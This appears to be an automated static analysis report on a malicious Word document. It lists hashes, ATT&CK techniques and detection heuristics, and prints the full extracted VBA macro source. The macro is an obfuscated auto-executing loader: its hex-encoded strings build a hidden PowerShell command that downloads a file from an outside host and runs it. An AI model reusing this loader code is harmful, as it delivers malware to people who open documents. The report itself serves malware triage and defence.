Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5b3aa9a41ff1ec84…

MALICIOUS

Office (OLE)

34.0 KB Created: 2017-06-22 03:58:00 Authoring application: Microsoft Office Word First seen: 2017-07-07
MD5: ef0c67af7086afbce12e1b7d411cb57a SHA-1: cce5f6cc13914275cbfa43f8f751989c6f8583aa SHA-256: 5b3aa9a41ff1ec8497864b30f9f261f1766111d4332aad663245887aec397288
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains heavily obfuscated VBA macros, including auto-executing Document_Open and Workbook_Open routines. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates a loader designed to execute code via 'CreateObject/Shell/exec'. The 'GetObject' and 'CallByName' calls are used in conjunction with obfuscated strings to likely construct and execute a malicious payload, suggesting a downloader functionality.

Heuristics 10

  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18)
        Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18))
        Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18)
        Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18))
        Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub Document_Open()
        CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        jSJWJoioisCWMvvKZZYnsRhPTdIGO = CallByName(Me, "AJaqaMBlpXie", VbMethod, "8281897784857A777E7E40778A77323F778A777587867B818082817E7B758B32748B82738585323F697B8076818965868B7E77325A7B76767780323F8081828481787B7E77323F8081778A7B86323F75325B576A323A6077893F61747C77758632658B8586777F4060778640697774557E7B7780863B40568189807E817376587B7E773A397A8686824C414185878282818486757780867784424A42424075817F41768189807E81737685417F738087737E40778A77393E3239", 18) & _
        Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D36746C85637557566384765586767D8484324F326077893F61747C777586323F75817F32857A777E7E407382827E7B7573867B81804D3236746C85637557566384765586767D848440857A777E7E778A77758786773A39", 18) & _
        Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D32778A7B864D", 18)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4071 bytes
SHA-256: dc471cabd54a845da9052c58ca5f64a594136a47c65a26910544488e16407521
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Public Sub Document_Open()
    CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Sub bZsQcEDQrdCtdkrr()
    Dim jSJWJoioisCWMvvKZZYnsRhPTdIGO As String
    jSJWJoioisCWMvvKZZYnsRhPTdIGO = CallByName(Me, "AJaqaMBlpXie", VbMethod, "8281897784857A777E7E40778A77323F778A777587867B818082817E7B758B32748B82738585323F697B8076818965868B7E77325A7B76767780323F8081828481787B7E77323F8081778A7B86323F75325B576A323A6077893F61747C77758632658B8586777F4060778640697774557E7B7780863B40568189807E817376587B7E773A397A8686824C414185878282818486757780867784424A42424075817F41768189807E81737685417F738087737E40778A77393E3239", 18) & _
    Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D36746C85637557566384765586767D8484324F326077893F61747C777586323F75817F32857A777E7E407382827E7B7573867B81804D3236746C85637557566384765586767D848440857A777E7E778A77758786773A39", 18) & _
    Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D32778A7B864D", 18)

    Dim tdFXHjZBrKkCTmaUFHgIektdGsKU As String
    Dim PyyNGYVivNqIlvHhGikEEBBV As Integer
    tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18)
    Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18))
    Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
    Dim fSiKBrpyeyLeIcHnC: Set fSiKBrpyeyLeIcHnC = CallByName(qPOmLxHndQYVOYya, CallByName(Me, "AJaqaMBlpXie", VbMethod, "65827389805B8085867380757771", 18), VbMethod)
    fSiKBrpyeyLeIcHnC.ShowWindow = 0
    Dim QTTXHDgZPtPgeiFbttQ: Set QTTXHDgZPtPgeiFbttQ = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F88444C697B8045447162848175778585", 18))
    CallByName QTTXHDgZPtPgeiFbttQ, CallByName(Me, "AJaqaMBlpXie", VbMethod, "558477738677", 18), VbMethod, jSJWJoioisCWMvvKZZYnsRhPTdIGO, Null, fSiKBrpyeyLeIcHnC, PyyNGYVivNqIlvHhGikEEBBV
End Sub

Public Function AJaqaMBlpXie(ByVal QTTXHDgZPtPgeiFbttQ As String, ByVal PyyNGYVivNqIlvHhGikEEBBV As Long) As String
    QTTXHDgZPtPgeiFbttQ = oEqwKBCToGBIXaUgUUyg(QTTXHDgZPtPgeiFbttQ)
    Dim i As Long
    AJaqaMBlpXie = Space$(Len(QTTXHDgZPtPgeiFbttQ))
    For i = 1& To Len(QTTXHDgZPtPgeiFbttQ)
        Mid$(AJaqaMBlpXie, i) = Chr$(Asc(Mid$(QTTXHDgZPtPgeiFbttQ, i, 1&)) - PyyNGYVivNqIlvHhGikEEBBV)
    Next
End Function

Private Function oEqwKBCToGBIXaUgUUyg(ByVal zVNooMbfnEmbGtgGFQ As String) As String
    Dim ZudxpXcEsCgjPwSPnTkQh As Integer
    Dim PAtMkYpKKhUxNiwyxrlhJCgvxFO As Integer
    Dim TMvaAfFCdDMdpHSYosI As String

    If Len(zVNooMbfnEmbGtgGFQ) = 0 Or Len(zVNooMbfnEmbGtgGFQ) Mod 2 <> 0 Then Exit Function
    ZudxpXcEsCgjPwSPnTkQh = Len(zVNooMbfnEmbGtgGFQ)
    For PAtMkYpKKhUxNiwyxrlhJCgvxFO = 1 To Len(zVNooMbfnEmbGtgGFQ)
      If PAtMkYpKKhUxNiwyxrlhJCgvxFO Mod 2 <> 0 Then
        TMvaAfFCdDMdpHSYosI = TMvaAfFCdDMdpHSYosI & Chr$(Val("&H" & Mid$(zVNooMbfnEmbGtgGFQ, PAtMkYpKKhUxNiwyxrlhJCgvxFO, 2)))
      End If
    Next
    oEqwKBCToGBIXaUgUUyg = TMvaAfFCdDMdpHSYosI
End Function